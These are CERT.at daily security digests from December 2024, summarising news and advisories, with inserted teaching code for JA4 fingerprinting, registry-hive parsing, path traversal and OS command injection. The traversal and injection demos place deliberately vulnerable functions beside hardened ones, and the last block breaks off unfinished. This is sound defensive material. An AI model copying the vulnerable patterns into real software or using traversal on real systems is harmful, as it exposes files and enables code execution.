=====================
= End-of-Day report =
=====================
Timeframe: Friday 20-12-2024 18:00 − Monday 23-12-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ Middle East Cyberwar Rages On, With No End in Sight ∗∗∗
---------------------------------------------
Since October 2023, cyberattacks among countries in the Middle East have persisted, fueled by the conflict between Israel and Hamas, reeling in others on a global scale.
---------------------------------------------
https://www.darkreading.com/cyberattacks-data-breaches/middle-east-cyberwar…
∗∗∗ Cloud Atlas seen using a new tool in its attacks ∗∗∗
---------------------------------------------
We analyze the latest activity by the Cloud Atlas gang. The attacks employ the PowerShower, VBShower and VBCloud modules to download victims' data with various PowerShell scripts.
---------------------------------------------
https://securelist.com/cloud-atlas-attacks-with-new-backdoor-vbcloud/115103/
∗∗∗ Modiloader From Obfuscated Batch File ∗∗∗
---------------------------------------------
My last investigation is a file called "Albertsons Payments.gz", received via email. The file looks like an archive but is identified as a picture by ..
---------------------------------------------
https://isc.sans.edu/diary/Modiloader+From+Obfuscated+Batch+File/31540
∗∗∗ Vulnerability & Patch Roundup - November 2024 ∗∗∗
---------------------------------------------
Vulnerability reports and responsible disclosures are essential for website security awareness and education. Automated attacks targeting known software vulnerabilities are one of the leading causes of website compromises. To help ..
---------------------------------------------
https://blog.sucuri.net/2024/12/vulnerability-patch-roundup-november-2024.h…
∗∗∗ Rockstar2FA Collapse Fuels Expansion of FlowerStorm Phishing-as-a-Service ∗∗∗
---------------------------------------------
An interruption to the phishing-as-a-service (PhaaS) toolkit called Rockstar 2FA has led to a rapid uptick in activity from another nascent offering named FlowerStorm. "It appears that the [Rockstar2FA] group running the service experienced at least a ..
---------------------------------------------
https://thehackernews.com/2024/12/rockstar2fa-collapse-fuels-expansion-of.h…
∗∗∗ l+f: Security researcher orders from McDonald's for 1 cent ∗∗∗
---------------------------------------------
McDonald's delivery service in India was broken and orders could be manipulated extensively.
---------------------------------------------
https://www.heise.de/news/l-f-Sicherheitsforscher-bestellt-bei-McDonald-s-f…
∗∗∗ Web browsers: Chrome and Edge to warn of scam pages using AI ∗∗∗
---------------------------------------------
To warn users about fraudulent websites, Chrome and Edge now ship with an AI-based protection. The feature is not yet enabled by default, however.
---------------------------------------------
https://www.heise.de/news/Webbrowser-Chrome-und-Edge-sollen-mittels-KI-vor-…
∗∗∗ Heels on fire. Hacking smart ski socks ∗∗∗
---------------------------------------------
TL;DR: A silly-season BLE connectivity story. Overheat people’s smart ski socks .. but only when in Bluetooth range AND when the owner’s phone is out of range of their feet! Having […]
---------------------------------------------
https://www.pentestpartners.com/security-blog/heels-on-fire-hacking-smart-s…
∗∗∗ Almost two thirds of all stolen crypto funds went to North Korea in 2024 ∗∗∗
---------------------------------------------
A recent analysis shows that the total value of stolen cryptocurrency has risen by 21 percent to 2.2 billion dollars so far this year
---------------------------------------------
https://www.derstandard.at/story/3000000250591/fast-zwei-drittel-aller-gest…
∗∗∗ NSO Group found liable for WhatsApp attack with Pegasus spyware ∗∗∗
---------------------------------------------
In 2019, WhatsApp users fell victim to an attack by spyware that could be installed on Android and iOS devices via a vulnerability. WhatsApp sued the NSO Group, which ..
---------------------------------------------
https://www.borncity.com/blog/2024/12/22/nso-group-fuer-angriff-mit-pegasus…
∗∗∗ Jingle Shells: How Virtual Offices Enable a Facade of Legitimacy ∗∗∗
---------------------------------------------
Virtual offices have revolutionized the way businesses operate. They provide cost-effective flexibility by eliminating the ..
---------------------------------------------
https://www.team-cymru.com/post/how-virtual-offices-enable-a-facade-of-legi…
∗∗∗ A Primer on JA4+: Empowering Threat Analysts with Better Traffic Analysis ∗∗∗
---------------------------------------------
What is JA4+ and Why Does It Matter? Introduction Threat analysts and researchers are continually seeking tools and methodologies to gain ..
---------------------------------------------
https://www.team-cymru.com/post/a-primer-on-ja4-empowering-threat-analysts-…
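The primer above does not show how a JA4 fingerprint is actually assembled. The following added example (the editor's code, not Team Cymru's and not the JA4 reference implementation) computes a JA4 string from ClientHello fields that a packet parser has already extracted. It follows the public JA4 specification: GREASE values are dropped, cipher suites and extensions are sorted before hashing, SNI (0x0000) and ALPN (0x0010) are excluded from the extension hash, signature algorithms are appended in their original order, and each hash is SHA-256 truncated to 12 hex characters. Two simplifications are assumptions of this example: the caller supplies the negotiated TLS version (the spec takes it from supported_versions when present), and the ALPN tag is simply the first and last character of the first ALPN value. The sample ClientHello fields are constructed, not captured.

```python
"""JA4 TLS client fingerprint from pre-extracted ClientHello fields.

Editor's example following the public JA4 spec; sample fields are constructed.
"""
import hashlib

# GREASE values (RFC 8701) are removed before counting and hashing.
GREASE = {0x0a0a, 0x1a1a, 0x2a2a, 0x3a3a, 0x4a4a, 0x5a5a, 0x6a6a, 0x7a7a,
          0x8a8a, 0x9a9a, 0xaaaa, 0xbaba, 0xcaca, 0xdada, 0xeaea, 0xfafa}
TLS_VERSIONS = {0x0304: "13", 0x0303: "12", 0x0302: "11", 0x0301: "10", 0x0300: "s3"}
SNI_EXT, ALPN_EXT = 0x0000, 0x0010
EMPTY_HASH = "000000000000"


def _hash12(text: str) -> str:
    """Truncated SHA-256 as JA4 uses it; an empty input yields twelve zeros."""
    if not text:
        return EMPTY_HASH
    return hashlib.sha256(text.encode()).hexdigest()[:12]


def ja4(protocol, version, sni_present, ciphers, extensions, alpn, sigalgs):
    """protocol: 't' (TCP) or 'q' (QUIC); version: TLS version as 16-bit int
    (assumed already resolved by the caller); ciphers/extensions/sigalgs: lists
    of 16-bit ints in wire order; alpn: list of ALPN protocol strings."""
    ciphers = [c for c in ciphers if c not in GREASE]
    extensions = [e for e in extensions if e not in GREASE]
    first_alpn = alpn[0] if alpn else ""
    alpn_tag = (first_alpn[0] + first_alpn[-1]) if first_alpn else "00"

    # JA4_a: protocol, version, SNI present (d) or not (i), counts, ALPN tag.
    ja4_a = "%s%s%s%02d%02d%s" % (
        protocol, TLS_VERSIONS.get(version, "00"),
        "d" if sni_present else "i",
        min(len(ciphers), 99), min(len(extensions), 99), alpn_tag)

    # JA4_b: hash of the sorted cipher list (so client-side reordering does not matter).
    ja4_b = _hash12(",".join("%04x" % c for c in sorted(ciphers)))

    # JA4_c: hash of sorted extensions minus SNI/ALPN, then '_' and the
    # signature algorithms in original order (omitted entirely when absent).
    ext_text = ",".join("%04x" % e for e in sorted(extensions)
                        if e not in (SNI_EXT, ALPN_EXT))
    if sigalgs:
        ext_text += "_" + ",".join("%04x" % s for s in sigalgs)
    ja4_c = _hash12(ext_text)

    return "%s_%s_%s" % (ja4_a, ja4_b, ja4_c)


# Constructed ClientHello fields (one GREASE cipher, one GREASE extension).
SAMPLE = dict(
    protocol="t", version=0x0304, sni_present=True,
    ciphers=[0x1a1a, 0x1301, 0x1302, 0x1303, 0xc02b, 0xc02f, 0xc02c, 0xc030,
             0xcca9, 0xcca8, 0xc013, 0xc014, 0x009c, 0x009d, 0x002f, 0x0035],
    extensions=[0x0a0a, 0x0000, 0x0017, 0xff01, 0x000a, 0x000b, 0x0023, 0x0010,
                0x0005, 0x000d, 0x0012, 0x0033, 0x002d, 0x002b, 0x001b, 0x0015,
                0x4469],
    alpn=["h2", "http/1.1"],
    sigalgs=[0x0403, 0x0804, 0x0401, 0x0503, 0x0805, 0x0501, 0x0806, 0x0601],
)

if __name__ == "__main__":
    print(ja4(**SAMPLE))
```

The JA4_a part of the sample comes out as t13d1516h2 (TLS 1.3 over TCP, SNI present, 15 ciphers, 16 extensions, ALPN h2), which is the human-readable portion an analyst pivots on before comparing the two hashes.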
∗∗∗ Supply Chain Attack Hits Rspack, Vant npm Packages with Monero Miner ∗∗∗
---------------------------------------------
Popular npm packages, Rspack and Vant, were recently compromised with malicious code. Learn about the attack, the impact, and how to protect your projects from similar threats.
---------------------------------------------
https://hackread.com/supply-chain-attack-rspack-vant-npm-monero-miner/
∗∗∗ Checking It Twice: Profiling Benign Internet Scanners — 2024 Edition ∗∗∗
---------------------------------------------
A comprehensive analysis of benign internet scanning activity from November 2024, examining how quickly and thoroughly various legitimate scanning services (like Shodan, Censys, and others) discover and probe new internet-facing assets. The study deployed 24 new sensors across 8 geographies and 5 autonomous systems, revealing that most scanners ..
---------------------------------------------
https://www.greynoise.io/blog/checking-it-twice-profiling-benign-internet-s…
∗∗∗ Critical security vulnerabilities threaten Sophos firewalls ∗∗∗
---------------------------------------------
Important security updates for Sophos firewalls have been released. With default settings they install automatically.
---------------------------------------------
https://heise.de/-10218914
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (gst-plugins-base1.0, libxstream-java, php-laravel-framework, python-urllib3, and sqlparse), Fedora (chromium, libcomps, libdnf, mingw-directxmath, mingw-gstreamer1, mingw-gstreamer1-plugins-bad-free, mingw-gstreamer1-plugins-base, mingw-gstreamer1-plugins-good, mingw-orc, ofono, prometheus-podman-exporter, ..
---------------------------------------------
https://lwn.net/Articles/1003287/
∗∗∗ WebKitGTK and WPE WebKit Security Advisory WSA-2024-0008 ∗∗∗
---------------------------------------------
Date Reported: December 22, 2024 Advisory ID: WSA-2024-0008 CVE identifiers: CVE-2024-54479, CVE-2024-54502, CVE-2024-54505, CVE-2024-54508, CVE-2024-54534 Several vulnerabilities were discovered in WebKitGTK and WPE WebKit. CVE-2024-54479 Versions affected: WebKitGTK and WPE WebKit before 2.46.5. Credit to Seunghyun Lee. Impact: Processing maliciously ..
---------------------------------------------
https://webkitgtk.org/security/WSA-2024-0008.html
∗∗∗ TR-91 - Vulnerability identified as CVE-2024-0012, affecting Palo Alto Networks PAN-OS software ∗∗∗
---------------------------------------------
https://www.circl.lu/pub/tr-91
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Thursday 19-12-2024 18:00 − Friday 20-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ In-house: CERT.at is hiring a Junior IT Security Analyst (m/f/d - full-time - Vienna) ∗∗∗
---------------------------------------------
For our ongoing routine work we are currently looking for a career starter or career changer with an interest in IT security.
---------------------------------------------
https://www.cert.at/de/ueber-uns/jobs/
∗∗∗ BadBox malware botnet infects 192,000 Android devices despite disruption ∗∗∗
---------------------------------------------
The BadBox Android malware botnet has grown to over 192,000 infected devices worldwide despite a recent sinkhole operation that attempted to disrupt the operation in Germany.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/badbox-malware-botnet-infect…
∗∗∗ The Windows Registry Adventure #5: The regf file format ∗∗∗
---------------------------------------------
This post aimed to systematically explore the inner workings of the regf format, focusing on the hard requirements enforced by Windows. Due to my role and interests, I looked at the format from a strictly security-oriented angle rather than digital forensics, which is the context in which registry hives are typically considered.
---------------------------------------------
https://googleprojectzero.blogspot.com/2024/12/the-windows-registry-adventu…
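The regf "hard requirements" the post refers to start with the base block: a 4096-byte header whose first 512 bytes carry the signature, two sequence numbers, version fields, the root cell offset and a checksum. The following added example (the editor's code, not Project Zero's and not part of the linked series) parses those fields and checks the two invariants Windows enforces on load: the checksum must equal the XOR of the 127 32-bit words preceding it (with 0 stored as 1 and 0xFFFFFFFF as 0xFFFFFFFE), and mismatched primary/secondary sequence numbers mark a hive that was not cleanly written. The sample base block is constructed in code, not taken from a real hive.

```python
"""Parse and validate a Windows registry hive (regf) base block.

Editor's example; offsets follow the documented regf base-block layout.
"""
import struct

BASE_BLOCK_SIZE = 4096
CHECKSUM_OFFSET = 508          # checksum DWORD sits at the end of the first 512 bytes
HEADER_FMT = "<4sIIQ7I"        # magic, seq1, seq2, FILETIME, major, minor, type,
                               # format, root cell offset, hbins size, clustering


def regf_checksum(block: bytes) -> int:
    """XOR of the 127 DWORDs before the checksum field, with the two special
    cases the on-disk format requires (0 -> 1, 0xFFFFFFFF -> 0xFFFFFFFE)."""
    csum = 0
    for (word,) in struct.iter_unpack("<I", block[:CHECKSUM_OFFSET]):
        csum ^= word
    if csum == 0:
        return 1
    if csum == 0xFFFFFFFF:
        return 0xFFFFFFFE
    return csum


def parse_regf_header(block: bytes) -> dict:
    """Return the base-block fields plus the two load-time invariants."""
    if len(block) < BASE_BLOCK_SIZE:
        raise ValueError("base block is %d bytes; got %d" % (BASE_BLOCK_SIZE, len(block)))
    (magic, primary_seq, secondary_seq, last_written, major, minor, file_type,
     file_format, root_cell, hbins_size, clustering) = struct.unpack_from(HEADER_FMT, block, 0)
    if magic != b"regf":
        raise ValueError("bad signature %r" % magic)
    # File name: 64 bytes of UTF-16LE at offset 48, NUL padded.
    name = block[48:48 + 64].decode("utf-16-le").split("\x00", 1)[0]
    stored = struct.unpack_from("<I", block, CHECKSUM_OFFSET)[0]
    return {
        "primary_seq": primary_seq,
        "secondary_seq": secondary_seq,
        "dirty": primary_seq != secondary_seq,   # log/transaction replay needed
        "last_written_filetime": last_written,
        "version": (major, minor),
        "file_type": file_type,                  # 0 = primary hive file
        "root_cell_offset": root_cell,           # relative to hive bins data (file offset 4096)
        "hbins_data_size": hbins_size,
        "name": name,
        "checksum_ok": stored == regf_checksum(block),
    }


def build_sample_header(primary_seq=7, secondary_seq=7, corrupt=False) -> bytes:
    """Construct a minimal valid base block (sample data, not a real hive)."""
    block = bytearray(BASE_BLOCK_SIZE)
    struct.pack_into(HEADER_FMT, block, 0, b"regf", primary_seq, secondary_seq,
                     0x01DB5209E3A0C000, 1, 5, 0, 1, 0x20, 0x1000, 1)
    name = "\\??\\C:\\sample\\NTUSER.DAT".encode("utf-16-le")
    block[48:48 + 64] = name.ljust(64, b"\x00")
    struct.pack_into("<I", block, CHECKSUM_OFFSET, regf_checksum(block))
    if corrupt:
        block[36] ^= 0xFF    # damage the root cell offset after the checksum was written
    return bytes(block)


if __name__ == "__main__":
    for label, blk in (("clean", build_sample_header()),
                       ("corrupt", build_sample_header(corrupt=True)),
                       ("dirty", build_sample_header(7, 8))):
        print(label, parse_regf_header(blk))
```

The checksum only covers the first 508 bytes, so it says nothing about the hive bins that follow; a loader that trusts a valid base block still has to bounds-check every cell offset against `hbins_data_size`.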
∗∗∗ BellaCPP: Discovering a new BellaCiao variant written in C++ ∗∗∗
---------------------------------------------
While investigating an incident involving the BellaCiao .NET malware, Kaspersky researchers discovered a C++ version they dubbed "BellaCPP".
---------------------------------------------
https://securelist.com/bellacpp-cpp-version-of-bellaciao/115087/
∗∗∗ NTLM on its way out: partially removed from Windows 11 24H2 and Server 2025 ∗∗∗
---------------------------------------------
Largely unnoticed, NTLMv1 has also been removed from Windows 11 24H2 and Server 2025.
---------------------------------------------
https://heise.de/-10217239
=====================
= Vulnerabilities =
=====================
∗∗∗ ZDI-24-1718: (0Day) Arista NG Firewall custom_handler Directory Traversal Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Arista NG Firewall. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 8.1. The following CVEs are assigned: CVE-2024-12830.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1718/
∗∗∗ ZDI-24-1724: (0Day) Delta Electronics DRASimuCAD STP File Parsing Type Confusion Remote Code Execution Vulnerability ∗∗∗
---------------------------------------------
This vulnerability allows remote attackers to execute arbitrary code on affected installations of Delta Electronics DRASimuCAD. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2024-12836.
---------------------------------------------
http://www.zerodayinitiative.com/advisories/ZDI-24-1724/
∗∗∗ Sophos: Resolved Multiple Vulnerabilities in Sophos Firewall (CVE-2024-12727, CVE-2024-12728, CVE-2024-12729) ∗∗∗
---------------------------------------------
Sophos has resolved three independent security vulnerabilities in Sophos Firewall (2x Critical, 1x High). To confirm that the hotfix has been applied to your firewall, please refer to KBA-000010084.
---------------------------------------------
https://www.sophos.com/en-us/security-advisories/sophos-sa-20241219-sfos-rce
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (chromium and gunicorn), Fedora (jupyterlab), Oracle (bluez, containernetworking-plugins, edk2:20220126gitbb1bba3d77, edk2:20240524, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, libsndfile, libsndfile:1.0.31, mpg123, mpg123:1.32.9, pam, python3.11-urllib3, skopeo, tuned, and unbound:1.16.2), SUSE (avahi, docker, emacs, govulncheck-vulndb, haproxy, kernel, libmozjs-128-0, python-grpcio, python310-xhtml2pdf, sudo, and tailscale), and Ubuntu (dpdk, linux-hwe-5.15, and linux-iot).
---------------------------------------------
https://lwn.net/Articles/1003019/
∗∗∗ Autodesk: DWFX File Parsing Vulnerabilities in Autodesk Navisworks Desktop Software ∗∗∗
---------------------------------------------
https://www.autodesk.com/trust/security-advisories/adsk-sa-2024-0027
∗∗∗ Tenable: [R1] Stand-alone Security Patch Available for Tenable Security Center versions 6.3.0, 6.4.0 and 6.4.5: SC-202412.1 ∗∗∗
---------------------------------------------
https://www.tenable.com/security/tns-2024-21
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 18-12-2024 18:00 − Thursday 19-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Attackers exploiting a patched FortiClient EMS vulnerability in the wild ∗∗∗
---------------------------------------------
During a recent incident response, Kaspersky’s GERT team identified a set of TTPs and indicators linked to an attacker that infiltrated a company’s networks by targeting a Fortinet vulnerability for which a patch was already available.
---------------------------------------------
https://securelist.com/patched-forticlient-ems-vulnerability-exploited-in-t…
∗∗∗ HubPhish Abuses HubSpot Tools to Target 20,000 European Users for Credential Theft ∗∗∗
---------------------------------------------
Cybersecurity researchers have disclosed a new phishing campaign that has targeted European companies with an aim to harvest account credentials and take control of the victims Microsoft Azure cloud infrastructure. [..] Targets include at least 20,000 automotive, chemical, and industrial compound manufacturing users in Europe. [..] The attacks involve sending phishing emails with Docusign-themed lures that urge recipients to view a document, which then redirects users to malicious HubSpot Free Form Builder links, from where they are led to a fake Office 365 Outlook Web App login page in order to steal their credentials.
---------------------------------------------
https://thehackernews.com/2024/12/hubphish-exploits-hubspot-tools-to.html
∗∗∗ Spyware distributed through Amazon Appstore ∗∗∗
---------------------------------------------
Recently, we uncovered a seemingly harmless app called “BMI CalculationVsn” on the Amazon App Store, which is secretly stealing the package name of installed apps and incoming SMS messages under the guise of a simple health tool.
---------------------------------------------
https://www.mcafee.com/blogs/other-blogs/mcafee-labs/spyware-distributed-th…
∗∗∗ Warning: AG Reparaturservice is a scam ∗∗∗
---------------------------------------------
Dishwasher broken? The website ag-reparaturservice.at purportedly offers repairs for all kinds of appliances. From refrigerators to washing machines to ovens, the company supposedly repairs household appliances. We advise caution: the repair is not carried out despite payment. You lose your money. We show you how to recognise the scam!
---------------------------------------------
https://www.watchlist-internet.at/news/ag-reparaturservice-ist-betrug/
∗∗∗ CISA urges senior government officials to lock down mobile devices amid ongoing Salt Typhoon breach ∗∗∗
---------------------------------------------
A 5-page advisory provided troves of guidance for both Apple and Android users, urging all “highly targeted individuals” to rely on the “consistent use of end-to-end encryption.”
---------------------------------------------
https://therecord.media/cisa-urges-senior-officials-to-lock-down-devices-sa…
∗∗∗ Hackers could crack the European power grid via vulnerabilities in solar installations ∗∗∗
---------------------------------------------
An unpleasant but by no means new finding. Germany may be "proud" of its installed solar capacity, but a Greek white-hat hacker has shown how, with a notebook and an internet connection, he could break into numerous European solar installations, including ones in Germany, and simply switch them off.
---------------------------------------------
https://www.borncity.com/blog/2024/12/19/hacker-koennten-ueber-schwachstell…
∗∗∗ Critical LDAP vulnerability in Windows (CVE-2024-49112) ∗∗∗
---------------------------------------------
A small addendum to the December 2024 Patch Tuesday. On 10 December 2024 Microsoft disclosed a critical vulnerability (CVE-2024-49112) in the Lightweight Directory Access Protocol (LDAP). It allows remote attacks on Windows clients and servers, but has been patched. [..] Hunter writes that scans via hunter.how find 178,900 LDAP and LDAPS services per year.
---------------------------------------------
https://www.borncity.com/blog/2024/12/19/kritische-ldap-schwachstelle-in-wi…
∗∗∗ Exploring vulnerable Windows drivers ∗∗∗
---------------------------------------------
This post is the result of research into the real-world application of the Bring Your Own Vulnerable Driver (BYOVD) technique along with Cisco Talos’ series of posts about malicious Windows drivers.
---------------------------------------------
https://blog.talosintelligence.com/exploring-vulnerable-windows-drivers/
∗∗∗ Scam email: cyber insurance does not have to cover the loss ∗∗∗
---------------------------------------------
Classic mail spoofing cost a German company 85,000 euros. Its cyber insurance does not cover the loss, says the Landgericht Hagen (Hagen regional court).
---------------------------------------------
https://heise.de/-10215212
∗∗∗ Skuld Infostealer Returns to npm with Fake Windows Utilities and Malicious Solara Development Packages ∗∗∗
---------------------------------------------
Socket’s threat research team identified a malware campaign infiltrating the npm ecosystem, deploying the Skuld infostealer just weeks after a similar attack targeted Roblox developers. [..] Before their removal, these packages compromised hundreds of machines, demonstrating how even low-complexity attacks can rapidly gain traction.
---------------------------------------------
https://socket.dev/blog/skuld-infostealer-returns-to-npm
=====================
= Vulnerabilities =
=====================
∗∗∗ FortiWLM Unauthenticated limited file read vulnerability ∗∗∗
---------------------------------------------
A relative path traversal [CWE-23] in FortiWLM may allow a remote unauthenticated attacker to read sensitive files. Severity: Critical, CVE-2023-34990
---------------------------------------------
https://www.fortiguard.com/psirt/FG-IR-23-144
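The FortiWLM advisory is a textbook instance of CWE-23: a file name taken from the request is joined onto a base directory and "../" segments walk out of it. The following added example (the editor's code, illustrating the weakness class; it is not FortiWLM code and says nothing about how that product is implemented) shows a vulnerable file-read handler next to a hardened one that resolves the final path and rejects anything outside the base directory. The directory layout and file contents are constructed in a temporary directory.

```python
"""Relative path traversal (CWE-23): vulnerable file read beside a hardened one.

Editor's example; the served directory and its files are constructed at runtime.
"""
import os
import tempfile


def read_file_unsafe(base_dir: str, name: str) -> bytes:
    # Vulnerable: "../" sequences in `name` walk out of base_dir, and an
    # absolute `name` makes os.path.join discard base_dir entirely.
    with open(os.path.join(base_dir, name), "rb") as fh:
        return fh.read()


def read_file_safe(base_dir: str, name: str) -> bytes:
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, name))
    # realpath + commonpath catches "../" escapes, absolute names, and
    # symlinks inside base_dir that point outside it.
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes base directory: %r" % name)
    with open(target, "rb") as fh:
        return fh.read()


def demo() -> dict:
    """Constructed layout: <tmp>/www/index.html is meant to be served,
    <tmp>/secret.txt is not."""
    root = tempfile.mkdtemp()
    www = os.path.join(root, "www")
    os.mkdir(www)
    with open(os.path.join(www, "index.html"), "wb") as fh:
        fh.write(b"<h1>hello</h1>")
    with open(os.path.join(root, "secret.txt"), "wb") as fh:
        fh.write(b"db_password=hunter2")

    results = {"unsafe_leak": read_file_unsafe(www, "../secret.txt")}
    try:
        read_file_safe(www, "../secret.txt")
        results["safe_leak"] = True
    except PermissionError:
        results["safe_leak"] = False
    results["safe_ok"] = read_file_safe(www, "index.html")
    return results


if __name__ == "__main__":
    print(demo())
```

Normalising the string (stripping "../") is not enough on its own: encoded separators, mixed slashes and symlinks all survive string-level filters, which is why the check above compares the resolved path rather than the input.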
∗∗∗ FortiManager OS command injection ∗∗∗
---------------------------------------------
An Improper Neutralization of Special Elements used in an OS Command (OS Command Injection) vulnerability [CWE-78] in FortiManager may allow an authenticated remote attacker to execute unauthorized code via FGFM crafted requests. Severity: High, CVE-2024-48889
---------------------------------------------
https://fortiguard.fortinet.com/psirt/FG-IR-24-425
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (bluez, edk2:20220126gitbb1bba3d77, gstreamer1-plugins-base, gstreamer1-plugins-good, kernel, kernel-rt, mpg123, php:8.2, python3.11-urllib3, and tuned), Fedora (ColPack, glibc, golang-github-chainguard-dev-git-urls, golang-github-task, icecat, python-nbdime, python3.13, and python3.14), Mageia (kernel, kmod-xtables-addons, kmod-virtualbox, dwarves and kernel-linus), Red Hat (gstreamer1-plugins-base and gstreamer1-plugins-good), SUSE (curl, emacs, git-bug, glib2, helm, kernel, and traefik2), and Ubuntu (gst-plugins-base1.0, gst-plugins-good1.0, gstreamer1.0, libvpx, linux-gcp, phpunit, and yara).
---------------------------------------------
https://lwn.net/Articles/1002903/
∗∗∗ Delta Electronics DTM Soft ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-03
∗∗∗ Hitachi Energy SDM600 ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-02
∗∗∗ Hitachi Energy RTU500 series CMU ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-01
∗∗∗ Ossur Mobile Logic Application ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-354-01
∗∗∗ Tibbo AggreGate Network Manager ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-354-05
=====================
= End-of-Day report =
=====================
Timeframe: Tuesday 17-12-2024 18:00 − Wednesday 18-12-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Critical security hole in Apache Struts under exploit ∗∗∗
---------------------------------------------
A critical security hole in Apache Struts 2 [..] CVE-2024-53677 [..] is currently being exploited using publicly available proof-of-concept (PoC) code.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/12/17/critical_rce…
∗∗∗ How to Lose a Fortune with Just One Bad Click ∗∗∗
---------------------------------------------
Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click "yes" to a Google prompt on his mobile device.
---------------------------------------------
https://krebsonsecurity.com/2024/12/how-to-lose-a-fortune-with-just-one-bad…
∗∗∗ AI-generated malvertising “white pages” are fooling detection engines ∗∗∗
---------------------------------------------
In this blog post, we take a look at a couple of examples where threat actors are buying Google Search ads and using AI to create white pages. The content is unique and sometimes funny if you are a real human, but unfortunately a computer analyzing the code would likely give it a green check.
---------------------------------------------
https://www.malwarebytes.com/blog/cybercrime/2024/12/ai-generated-malvertis…
∗∗∗ Spotify: beware of fraudulent phishing emails ∗∗∗
---------------------------------------------
Reports of fraudulent emails purporting to come from Spotify are currently piling up. They claim that a problem occurred with payment processing, so that Spotify could not debit the subscription fee and has therefore temporarily suspended the account. To continue using Spotify, you are asked to update your account information. This is phishing, however!
---------------------------------------------
https://www.watchlist-internet.at/news/spotify-vorsicht-vor-betruegerischen…
∗∗∗ Detailing the Attack Surfaces of the Tesla Wall Connector EV Charger ∗∗∗
---------------------------------------------
Trend ZDI researchers have performed an analysis of the discrete hardware components found in the device.
---------------------------------------------
https://www.thezdi.com/blog/2024/12/16/detailing-the-attack-surfaces-of-the…
∗∗∗ Phishing scheme targets Google Calendar users ∗∗∗
---------------------------------------------
According to an analysis by security researchers, cybercriminals are apparently increasingly using Google Calendar invites to lure internet users to phishing pages.
---------------------------------------------
https://heise.de/-10214705
∗∗∗ [Guest Diary] A Deep Dive into TeamTNT and Spinning YARN, (Wed, Dec 18th) ∗∗∗
---------------------------------------------
TeamTNT is running a crypto mining campaign dubbed Spinning YARN. Spinning YARN focuses on exploiting Docker, Redis, YARN, and Confluence. On November 4th, 2024, my DShield sensor recorded suspicious activity targeting my web server. The attacker attempted to use a technique that tricks the server into running harmful commands.
---------------------------------------------
https://isc.sans.edu/diary/rss/31530
=====================
= Vulnerabilities =
=====================
∗∗∗ BeyondTrust BT24-10: Command Injection Vulnerability / Severity: Critical ∗∗∗
---------------------------------------------
A critical vulnerability has been discovered in Privileged Remote Access (PRA) and Remote Support (RS) products which can allow an unauthenticated attacker to inject commands that are run as a site user. CVE(s): CVE-2024-12356
---------------------------------------------
https://www.beyondtrust.com/trust-center/security-advisories/bt24-10
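The BeyondTrust BT24-10 entry above and the FortiManager FG-IR-24-425 entry in the previous report both describe the same weakness class, OS command injection (CWE-78). The following added example (the editor's code; it is not BeyondTrust's or Fortinet's and does not describe how either product is implemented) builds a "ping this host" command the vulnerable way, by interpolating input into a shell command line, and the hardened way, by validating the input and passing it as one argv element with no shell. A small tokenizer shows what a POSIX shell would actually run for each string. Host names are constructed sample input.

```python
"""OS command injection (CWE-78): interpolated shell string vs. validated argv.

Editor's example; commands are built and inspected, not executed.
"""
import re
import shlex
import subprocess

HOSTNAME_RE = re.compile(r"^[A-Za-z0-9.-]{1,253}$")


def build_ping_unsafe(host: str) -> str:
    # Vulnerable: this string is meant for shell=True, so ';', '|', '$(...)'
    # inside `host` become additional commands.
    return "ping -c 1 %s" % host


def build_ping_quoted(host: str) -> str:
    # Mitigation if a shell really is unavoidable: quote the untrusted part.
    return "ping -c 1 %s" % shlex.quote(host)


def build_ping_safe(host: str) -> list:
    # Hardened: allowlist the input, reject option-like values ("-c" would be
    # argument injection), and hand it over as a single argv element.
    if not HOSTNAME_RE.match(host) or host.startswith("-"):
        raise ValueError("rejected host: %r" % host)
    return ["ping", "-c", "1", host]


def run_safe(host: str) -> int:
    """Execute the hardened form; shell=False means no shell parses anything."""
    return subprocess.run(build_ping_safe(host), shell=False,
                          stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL).returncode


def shell_commands(cmdline: str) -> list:
    """Tokenize like a POSIX shell and split into the separate commands it would run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for tok in lexer:
        if tok in (";", "|", "||", "&&", "&"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


if __name__ == "__main__":
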